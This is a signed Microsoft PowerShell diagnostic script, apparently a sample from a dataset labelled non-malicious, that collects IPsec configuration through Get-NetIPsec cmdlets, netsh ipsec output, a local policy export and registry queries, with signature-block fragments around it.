// SIG // TWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1N
// SIG // aWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIw
// SIG // DQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAOThpkzn
// SIG // tHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjKNVf2AX9s
// SIG // SuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWN
// SIG // E893MsAQGOhgfWpSg0S3po5GawcU88V29YZQ3MFEyHFc
// SIG // UTE3oAo4bo3t1w/YJlN8OWECesSq/XJprx2rrPY2vjUm
// SIG // ZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W
// SIG // 7IVWTe/dvI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0
// SIG // hyTD4MmPfrVUj9z6BVWYbWg7mka97aSueik3rMvrg0Xn
// SIG // Rm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De
// SIG // +JKRHh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXf
// SIG // tnIv231fgLrbqn427DZM9ituqBJR6L8FA6PRc6ZNN3SU
// SIG // HDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO
// SIG // ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYcten
// SIG // IPDC+hIK12NvDMk2ZItboKaDIV1fMHSRlJTYuVD5C4lh
// SIG // 8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6bMUR
// SIG // HXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54W
// SIG // cmnGrnu3tz5q4i6tAgMBAAGjggHdMIIB2TASBgkrBgEE
// SIG // AYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQWBBQqp1L+
// SIG // ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBe
// SIG // Yl2D9OXSZacbUzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEE
// SIG // AYI3TIN9AQEwQTA/BggrBgEFBQcCARYzaHR0cDovL3d3
// SIG // dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9z
// SIG // aXRvcnkuaHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkG
// SIG // CSsGAQQBgjcUAgQMHgoAUwB1AGIAQwBBMAsGA1UdDwQE
// SIG // AwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaA
// SIG // FNX2VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0w
// SIG // S6BJoEeGRWh0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9w
// SIG // a2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw
// SIG // LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYB
// SIG // BQUHMAKGPmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9w
// SIG // a2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMu
// SIG // Y3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9n
// SIG // ATEkW+Geckv8qW/qXBS2Pk5HZHixBpOXPTEztTnXwnE2
// SIG // P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6U03dmLq2
// SIG // HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1
// SIG // AdkY3m2CDPVtI1TkeFN1JFe53Z/zjj3G82jfZfakVqr3
// SIG // lbYoVSfQJL1AoL8ZthISEV09J+BAljis9/kpicO8F7BU
// SIG // hUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tu
// SIG // PywJeBTpkbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZ
// SIG // lvSP9pEB9s7GdP32THJvEKt1MMU0sHrYUP4KWN1APMdU
// SIG // bZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz
// SIG // 138eW0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFH
// SIG // qfG3rsjoiV5PndLQTHa1V1QJsWkBRH58oWFsc/4Ku+xB
// SIG // Zj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7
// SIG // Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A24
// SIG // 5oyZ1uEi6vAnQj0llOZ0dFtq0Z4+7X6gMTN9vMvpe784
// SIG // cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQtB1V
// SIG // M1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jEL
// SIG // MAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
// SIG // EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
// SIG // c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9z
// SIG // b2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYw
// SIG // JAYDVQQLEx1UaGFsZXMgVFNTIEVTTjozQkQ0LTRCODAt
// SIG // NjlDMzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3Rh
// SIG // bXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUA942iGuYF
// SIG // rsE4wzWDd85EpM6RiwqggYMwgYCkfjB8MQswCQYDVQQG
// SIG // EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
// SIG // BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
// SIG // cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGlt
// SIG // ZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF
// SIG // AOnBNgowIhgPMjAyNDA0MTEwMDAwMTBaGA8yMDI0MDQx
// SIG // MjAwMDAxMFowdDA6BgorBgEEAYRZCgQBMSwwKjAKAgUA
// SIG // 6cE2CgIBADAHAgEAAgIzwjAHAgEAAgISATAKAgUA6cKH
// SIG // igIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZ
// SIG // CgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqG
// SIG // SIb3DQEBBQUAA4GBAHn0MAPBqT2k7pkyjIQQr/xHgtus
// SIG // DZPXycTbUNXGIT3jyknz5jfiAIP4R74+jpXhfJ4U5TVC
// SIG // FULUEvajYAYGh9YvocS87sTQiIr79Xa3Z1ttnGnlW1P/
// SIG // +eEy6IjYVhveqoSQTORnZtctsHkLgHLXx4BT61y583lk
// SIG // /PnH9J3d7V1yMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UE
// SIG // BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNV
// SIG // BAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD
// SIG // b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp
// SIG // bWUtU3RhbXAgUENBIDIwMTACEzMAAAHlj2rA8z20C6MA
// SIG // AQAAAeUwDQYJYIZIAWUDBAIBBQCgggFKMBoGCSqGSIb3
// SIG // DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx
// SIG // IgQgS0RJaEewROmJj9HjCEOPiJgVzUzrbE1+gxm1wo4V
// SIG // vREwgfoGCyqGSIb3DQEJEAIvMYHqMIHnMIHkMIG9BCAV
// SIG // qdP//qjxGFhe2YboEXeb8I/pAof01CwhbxUH9U697TCB
// SIG // mDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpX
// SIG // YXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYD
// SIG // VQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNV
// SIG // BAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw
// SIG // AhMzAAAB5Y9qwPM9tAujAAEAAAHlMCIEIH1g111bzYGA
// SIG // T+D1bF+34NSiDMe03KrJ191UAZ82o3U1MA0GCSqGSIb3
// SIG // DQEBCwUABIICAH8iRfDhMbNb3fRYFtTfnQlg6nznlNIK
// SIG // LCAFT9RPkdqvC4sEJKSBAWWDiHOrHIG2JfFCxTP+mawQ
// SIG // DUFEh7aRdij5zEVjdFA0GeB+oCizdghnswwte4KHwiSV
// SIG // Z4Let578v/URVfpfVa11ILHf24gMOg6PoG4Im4RXWQSy
// SIG // kipeG9/ojXo+nBkimcVhyIHtUTzF3gFh7F6FrHHmXgIL
// SIG // BFFwtJQ+pF88gUSAgh2mAjXdGSzgBi/grJc+wVIso9Bf
// SIG // l2aBsDsYX1LpkbzpfxXD28cpwGgDl4s5F2Lhl6HSpnm4
// SIG // BR4FF3ZHK//5HkqelkO5RrVVaiYG92Qlp21B1NHkEJCm
// SIG // UEhu1JSaemr6XrXxLMfZjkosD2SJP3Iq5CuHEFcN2Zuz
// SIG // A6GDHxmvR01RkH5+SySTsiunUIL3lDqvm6vV6dAV6psK
// SIG // 89X6lCvXBgKE1eX1zIjMYyxIJcOnRmN/95w4BoKkkdGp
// SIG // KIi7BxDeA1zMMdI9L4atZxv0qRidb5WXOVmS0Wzf4e+g
// SIG // claX5fP6FOc9j10Hwy62iI8NWmd0iWiDyr04F5F1Q3KW
// SIG // u3WPRDDaS8wxhXM3AP7lxWNqbFpsQpdqlJo2xAbOrMic
// SIG // jh9DfMW34Six0EIM2Flt+EquNziVQlzvJdHa4bsEZRVQ
// SIG // PGGDpPWU4/he8jVR8XCJ1X7T6nLFGCi0c6om
// SIG // End signature block
|
combined_dataset/train/non-malicious/sample_9_74.ps1
|
sample_9_74.ps1
|
#************************************************
# DC_IPsec-Component.ps1
# Version 1.0
# Version 1.1: Altered the runPS function correctly a column width issue.
# Date: 2009-2014
# Author: Boyd Benson (bbenson@microsoft.com)
# Description: Collects information about the IPsec component.
# Called from: Main Networking Diag
#*******************************************************
Trap [Exception]
{
# Handle exception and throw it to the stdout log file. Then continue with function and script.
$Script:ExceptionMessage = $_
"[info]: Exception occurred." | WriteTo-StdOut
"[info]: Exception.Message $ExceptionMessage." | WriteTo-StdOut
$Error.Clear()
continue
# later use return to return the exception message to an object: return $Script:ExceptionMessage
}
Import-LocalizedData -BindingVariable ScriptVariable
Write-DiagProgress -Activity $ScriptVariable.ID_CTSIPsec -Status $ScriptVariable.ID_CTSIPsecDescription
# detect OS version and SKU
$wmiOSVersion = Get-CimInstance -Namespace "root\cimv2" -Class Win32_OperatingSystem
[int]$bn = [int]$wmiOSVersion.BuildNumber
function RunNetSH ([string]$NetSHCommandToExecute="")
{
Write-DiagProgress -Activity $ScriptVariable.ID_CTSIPsec -Status "netsh $NetSHCommandToExecute"
$NetSHCommandToExecuteLength = $NetSHCommandToExecute.Length + 6
"`n`n`n" + "-" * ($NetSHCommandToExecuteLength) + "`r`n" + "netsh $NetSHCommandToExecute" + "`r`n" + "-" * ($NetSHCommandToExecuteLength) | Out-File -FilePath $OutputFile -append
$CommandToExecute = "cmd.exe /c netsh.exe " + $NetSHCommandToExecute + " >> $OutputFile "
RunCmD -commandToRun $CommandToExecute -CollectFiles $false
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
}
function RunPS ([string]$RunPScmd="", [switch]$ft)
{
$RunPScmdLength = $RunPScmd.Length
"-" * ($RunPScmdLength) | Out-File -FilePath $OutputFile -append
"$RunPScmd" | Out-File -FilePath $OutputFile -append
"-" * ($RunPScmdLength) | Out-File -FilePath $OutputFile -append
if ($ft)
{
# This format-table expression is useful to make sure that wide ft output works correctly
Invoke-Expression $RunPScmd |format-table -autosize -outvariable $FormatTableTempVar | Out-File -FilePath $outputFile -Width 500 -append
}
else
{
Invoke-Expression $RunPScmd | Out-File -FilePath $OutputFile -append
}
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
}
$sectionDescription = "IPsec"
if ($bn -gt 9000)
{
$outputFile = join-path $pwd.path ($ComputerName + "_IPsec_info_pscmdlets.TXT")
"========================================" | Out-File -FilePath $OutputFile -append
"IPsec Powershell Cmdlets" | Out-File -FilePath $OutputFile -append
"========================================" | Out-File -FilePath $OutputFile -append
"Overview" | Out-File -FilePath $OutputFile -append
"----------------------------------------" | Out-File -FilePath $OutputFile -append
" 1. Get-NetIPsecDospSetting" | Out-File -FilePath $OutputFile -append
" 2. Get-NetIPsecMainModeCryptoSet" | Out-File -FilePath $OutputFile -append
" 3. Get-NetIPsecMainModeRule" | Out-File -FilePath $OutputFile -append
" 4. Get-NetIPsecMainModeSA" | Out-File -FilePath $OutputFile -append
" 5. Get-NetIPsecPhase1AuthSet" | Out-File -FilePath $OutputFile -append
" 6. Get-NetIPsecPhase2AuthSet" | Out-File -FilePath $OutputFile -append
" 7. Get-NetIPsecQuickModeCryptoSet" | Out-File -FilePath $OutputFile -append
" 8. Get-NetIPsecQuickModeSA" | Out-File -FilePath $OutputFile -append
"========================================" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
# This command exceptions on client skus
#_#if ($bn -gt 9000)
#_#if ($bn -ge 9000)
#Get role, OSVer, hotfix data. #_#
$cs = Get-CimInstance -Namespace "root\cimv2" -class win32_computersystem #-ComputerName $ComputerName #_#
$DomainRole = $cs.domainrole #_#
if (($bn -gt 9000) -and ($DomainRole -ge 2)) #_# not on Win8+,Win10 client
{
runPS "Get-NetIPsecDospSetting" # W8/WS2012, W8.1/WS2012R2 # fl
}
runPS "Get-NetIPsecMainModeCryptoSet" # W8/WS2012, W8.1/WS2012R2 # unknown
runPS "Get-NetIPsecMainModeRule" # W8/WS2012, W8.1/WS2012R2 # unknown
runPS "Get-NetIPsecMainModeSA" # W8/WS2012, W8.1/WS2012R2 # fl
runPS "Get-NetIPsecPhase1AuthSet" # W8/WS2012, W8.1/WS2012R2 # unknown
runPS "Get-NetIPsecPhase2AuthSet" # W8/WS2012, W8.1/WS2012R2 # unknown
runPS "Get-NetIPsecQuickModeCryptoSet" # W8/WS2012, W8.1/WS2012R2 # unknown
runPS "Get-NetIPsecQuickModeSA" # W8/WS2012, W8.1/WS2012R2 # fl
CollectFiles -sectionDescription $sectionDescription -fileDescription "IPsec Powershell Cmdlets" -filesToCollect $outputFile
}
#----------Netsh
$OutputFile = $ComputerName + "_IPsec_netsh_dynamic.TXT"
"========================================" | Out-File -FilePath $OutputFile -append
"IPsec Netsh Output (DYNAMIC)" | Out-File -FilePath $OutputFile -append
"========================================" | Out-File -FilePath $OutputFile -append
"Overview" | Out-File -FilePath $OutputFile -append
"----------------------------------------" | Out-File -FilePath $OutputFile -append
" 1. netsh ipsec dynamic show all" | Out-File -FilePath $OutputFile -append
"========================================" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
RunNetSH -NetSHCommandToExecute "ipsec dynamic show all"
CollectFiles -filesToCollect $OutputFile -fileDescription "IPsec netsh dynamic show all" -SectionDescription $sectionDescription
$OutputFile = $ComputerName + "_IPsec_netsh_static.TXT"
"========================================" | Out-File -FilePath $OutputFile -append
"IPsec Netsh Output (STATIC)" | Out-File -FilePath $OutputFile -append
"========================================" | Out-File -FilePath $OutputFile -append
"Overview" | Out-File -FilePath $OutputFile -append
"----------------------------------------" | Out-File -FilePath $OutputFile -append
" 1. netsh ipsec static show all" | Out-File -FilePath $OutputFile -append
"========================================" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
"`n" | Out-File -FilePath $OutputFile -append
RunNetSH -NetSHCommandToExecute "ipsec static show all"
CollectFiles -filesToCollect $OutputFile -fileDescription "IPsec netsh static show all" -SectionDescription $sectionDescription
$filesToCollect = $ComputerName + "_IPsec_netsh_LocalPolicyExport.ipsec"
$commandToRun = "netsh ipsec static exportpolicy " + $filesToCollect
RunCMD -CommandToRun $commandToRun -filesToCollect $filesToCollect -fileDescription "IPsec Local Policy Export" -sectionDescription $sectionDescription
#----------Registry
$OutputFile= $Computername + "_IPsec_reg_.TXT"
$CurrentVersionKeys = "HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec",
"HKLM\SYSTEM\CurrentControlSet\Services\IPsec",
"HKLM\SYSTEM\CurrentControlSet\Services\IKEEXT",
"HKLM\SYSTEM\CurrentControlSet\Services\PolicyAgent"
RegQuery -RegistryKeys $CurrentVersionKeys -Recursive $true -OutputFile $OutputFile -fileDescription "IPsec Registry keys" -SectionDescription $sectionDescription
# SIG # Begin signature block
# MIIoQwYJKoZIhvcNAQcCoIIoNDCCKDACAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCwI5X2MVP25ueF
# cHJmS75fOdey8/8dl+SeqDNfYqIidKCCDXYwggX0MIID3KADAgECAhMzAAAEBGx0
# Bv9XKydyAAAAAAQEMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTE0WhcNMjUwOTExMjAxMTE0WjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQC0KDfaY50MDqsEGdlIzDHBd6CqIMRQWW9Af1LHDDTuFjfDsvna0nEuDSYJmNyz
# NB10jpbg0lhvkT1AzfX2TLITSXwS8D+mBzGCWMM/wTpciWBV/pbjSazbzoKvRrNo
# DV/u9omOM2Eawyo5JJJdNkM2d8qzkQ0bRuRd4HarmGunSouyb9NY7egWN5E5lUc3
# a2AROzAdHdYpObpCOdeAY2P5XqtJkk79aROpzw16wCjdSn8qMzCBzR7rvH2WVkvF
# HLIxZQET1yhPb6lRmpgBQNnzidHV2Ocxjc8wNiIDzgbDkmlx54QPfw7RwQi8p1fy
# 4byhBrTjv568x8NGv3gwb0RbAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU8huhNbETDU+ZWllL4DNMPCijEU4w
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMjkyMzAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAIjmD9IpQVvfB1QehvpC
# Ge7QeTQkKQ7j3bmDMjwSqFL4ri6ae9IFTdpywn5smmtSIyKYDn3/nHtaEn0X1NBj
# L5oP0BjAy1sqxD+uy35B+V8wv5GrxhMDJP8l2QjLtH/UglSTIhLqyt8bUAqVfyfp
# h4COMRvwwjTvChtCnUXXACuCXYHWalOoc0OU2oGN+mPJIJJxaNQc1sjBsMbGIWv3
# cmgSHkCEmrMv7yaidpePt6V+yPMik+eXw3IfZ5eNOiNgL1rZzgSJfTnvUqiaEQ0X
# dG1HbkDv9fv6CTq6m4Ty3IzLiwGSXYxRIXTxT4TYs5VxHy2uFjFXWVSL0J2ARTYL
# E4Oyl1wXDF1PX4bxg1yDMfKPHcE1Ijic5lx1KdK1SkaEJdto4hd++05J9Bf9TAmi
# u6EK6C9Oe5vRadroJCK26uCUI4zIjL/qG7mswW+qT0CW0gnR9JHkXCWNbo8ccMk1
# sJatmRoSAifbgzaYbUz8+lv+IXy5GFuAmLnNbGjacB3IMGpa+lbFgih57/fIhamq
# 5VhxgaEmn/UjWyr+cPiAFWuTVIpfsOjbEAww75wURNM1Imp9NJKye1O24EspEHmb
# DmqCUcq7NqkOKIG4PVm3hDDED/WQpzJDkvu4FrIbvyTGVU01vKsg4UfcdiZ0fQ+/
# V0hf8yrtq9CkB8iIuk5bBxuPMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGiMwghofAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAQEbHQG/1crJ3IAAAAABAQwDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIIvkvJFS+N0rsU5GJUNXwguk
# J6jG0eoyD/MDP0LStdf9MEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEAe+Bj54wpcyEzIX0GKMpLrVfE6pKOTpyO8hTgKs6dKiE4bUtCI6YLqyqg
# BJmLHjLme4ugHzdyRJwMiyhfCji64LGk+fi6bBssvzBvJOC07/gR48D0qeE3OM8Y
# +LqlPpiFqATLg43kjsgwsnugo34iwFqyF6M1UkdErusxbofHLGd6Ja9u1y2qEtha
# X1BQZH8cfXwBYaeXh0e7kYlEELv+nrXgUQWQdeEIrGwJHTrDvdKivOaBmNAHiUwF
# ydI82Ngg04cHxHJcoTzpfqZeaIeGtGkgDdtug+smmCZMIDDNDmDaaif5tCtwwg9P
# 60Q2s+iMD9xDmLmh4hOkkT31DOpKs6GCF60wghepBgorBgEEAYI3AwMBMYIXmTCC
# F5UGCSqGSIb3DQEHAqCCF4YwgheCAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFaBgsq
# hkiG9w0BCRABBKCCAUkEggFFMIIBQQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCDNk2CypbuDDTYbapY03QpuYTmmJAPeSkHHVoNoWRQOEQIGZutwxmYn
# GBMyMDI0MTAyODExNDA0NS4wMzNaMASAAgH0oIHZpIHWMIHTMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl
# bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT
# Tjo1NTFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg
# U2VydmljZaCCEfswggcoMIIFEKADAgECAhMzAAACAdFFWZgQzEJPAAEAAAIBMA0G
